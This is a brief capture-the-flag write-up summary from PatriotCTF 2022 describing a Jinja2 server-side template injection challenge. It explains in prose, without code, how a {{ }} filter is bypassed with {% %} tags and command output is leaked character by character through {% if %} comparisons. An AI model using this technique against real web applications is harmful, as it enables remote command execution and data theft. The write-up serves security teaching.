Tags: ssti 

Rating: 5.0

TL;DR: SSTI in Jinja2. Filter on {{ and }}, but bypassed by using {% and %} instead. Get output of system commands executed using this SSTI by using {% if %} tag to print to page if a character in the output matches with another character of our choosing. Brute-force this other character to leak outputs of commands and eventually leak contents of admin.html.

Original writeup (https://x-c-3.github.io/posts/patriotctf-2022/#mr-o).